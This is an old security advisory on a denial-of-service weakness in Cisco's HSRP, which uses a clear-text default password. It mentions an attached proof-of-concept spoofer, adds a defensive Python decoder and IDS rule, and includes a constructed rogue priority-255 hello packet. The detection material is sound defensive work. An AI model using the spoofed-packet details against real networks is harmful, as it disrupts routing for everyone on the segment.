COMMAND

    Cisco

SYSTEMS AFFECTED

    Cisco HSRP

PROBLEM

    'bashis' found the following.  He was playing with Cisco's HSRP (Hot
    Standby Routing Protocol), and there is a (major) weakness in that
    protocol that allows any host on a LAN segment to mount an HSRP DoS.

    A (very) short explanation of HSRP: HSRP uses UDP port 1985 to the
    multicast address 224.0.0.2, and the authentication string is sent
    in clear text (default: cisco).

    Included (as the attachment hsrp-dos.tgz) is a small program that
    sends out a fake HSRP packet when it hears a legitimate HSRP packet,
    as "proof of concept" code...
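    As an added example (not the advisory's own code or the attached
    program), here is a defender-side decoder for the HSRPv1 header from
    RFC 2281 that flags the two conditions the advisory describes: the
    clear-text default authentication string, and HSRP traffic from a
    host that is not one of the configured routers.  The router
    addresses, virtual IP and sample packets are constructed for the
    demonstration, and the audit() rule is a hypothetical IDS check.

```python
# Added example, not the advisory's code or its attached program: decode the RFC 2281
# HSRPv1 header and flag the weaknesses described above (clear-text default password,
# HSRP traffic from a host that is not a configured router).  Samples are constructed.
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

HSRP_UDP_PORT, HSRP_MCAST = 1985, "224.0.0.2"  # where HSRPv1 hellos are sent
OPCODES = {0: "hello", 1: "coup", 2: "resign"}
STATES = {0: "initial", 1: "learn", 2: "listen", 4: "speak", 8: "standby", 16: "active"}
DEFAULT_AUTH = b"cisco"  # the common default the advisory criticises


@dataclass
class HsrpPacket:
    opcode: int
    state: int
    hellotime: int
    holdtime: int
    priority: int
    group: int
    auth: bytes
    virtual_ip: str


def parse_hsrp(payload: bytes) -> HsrpPacket:
    """Decode the fixed 20-byte HSRPv1 header carried as the UDP payload."""
    if len(payload) < 20:
        raise ValueError("truncated HSRP packet")
    ver, op, st, hello, hold, prio, grp, _rsvd, auth, vip = struct.unpack("!8B8s4s", payload[:20])
    if ver != 0:
        raise ValueError(f"unsupported HSRP version {ver}")
    return HsrpPacket(op, st, hello, hold, prio, grp, auth.rstrip(b"\x00"), str(IPv4Address(vip)))


def audit(src_ip: str, payload: bytes, known_routers: set) -> list:
    """Hypothetical IDS rule: findings for one HSRP packet seen on the segment."""
    p = parse_hsrp(payload)
    findings = []
    if p.auth == DEFAULT_AUTH:
        findings.append(f"group {p.group}: default authentication string in use")
    if src_ip not in known_routers:  # only the configured routers should ever speak HSRP
        findings.append(f"group {p.group}: {OPCODES.get(p.opcode, str(p.opcode))} (priority {p.priority}, "
                        f"{STATES.get(p.state, str(p.state))}) from unexpected host {src_ip}")
    return findings


# Constructed samples: the real active router's hello (priority 100), and a hello for the
# same group claiming priority 255 from an address that is not one of the configured routers.
KNOWN_ROUTERS = {"10.0.0.2", "10.0.0.3"}
HELLO_OK = bytes([0, 0, 16, 3, 10, 100, 1, 0]) + b"cisco".ljust(8, b"\x00") + bytes([10, 0, 0, 1])
HELLO_ROGUE = bytes([0, 0, 16, 3, 10, 255, 1, 0]) + b"cisco".ljust(8, b"\x00") + bytes([10, 0, 0, 1])
```

    Feed audit() the source address and UDP payload of every packet to
    224.0.0.2:1985 captured on the segment; the set of configured
    routers is the only baseline the rule needs.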


    - this vulnerability can be exploited only from the local segment
      (not over the Internet),
    - the same effect, denial of service, can be produced by using
      ARP, which cannot be protected against in any way

    The last point is especially important, since it may create a false
    sense of security when a hardened version of the protocol (whichever
    protocol) is in use.  Even with VRRP and the ESP+AH option, an
    attacker can still disrupt the network by using ARP.

SOLUTION

    The vendor was notified about this on 14 April 2001, and their
    response was to use HSRP with IPsec.

    Their response was  precisely correct.   Given the evils  that can
    be done  with ARP-spoofing,  this sort  of misbehavior  by someone
    already on  the LAN  can't easily  be prevented.   More generally,
    have a look at RFC 2338, on VRRP -- the Virtual Router  Redundancy
    Protocol.  VRRP is the standards-track replacement for HSRP.   The
    Security Considerations section explains when to use each type  of
    authentication, up to and including IPsec.

    Cisco's real mistake is in having a common default  authentication
    word -- not  because it's a  security failure, but  because it can
    no longer fulfill its  function of guarding against  configuration
    errors.

    It's really old news; this was already known in '98 when they wrote
    RFC 2281, but nobody has talked about it in public, except Cisco,
    who keep saying how good it is for getting a fault-tolerant
    network..

    Cisco can confirm that the described vulnerability is present in
    HSRP and, at the present time, there is no workaround for it.
    Cisco is considering the use of the IP Authentication Header for
    HSRP and VRRP (Virtual Router Redundancy Protocol, RFC 2338) in
    future releases of IOS.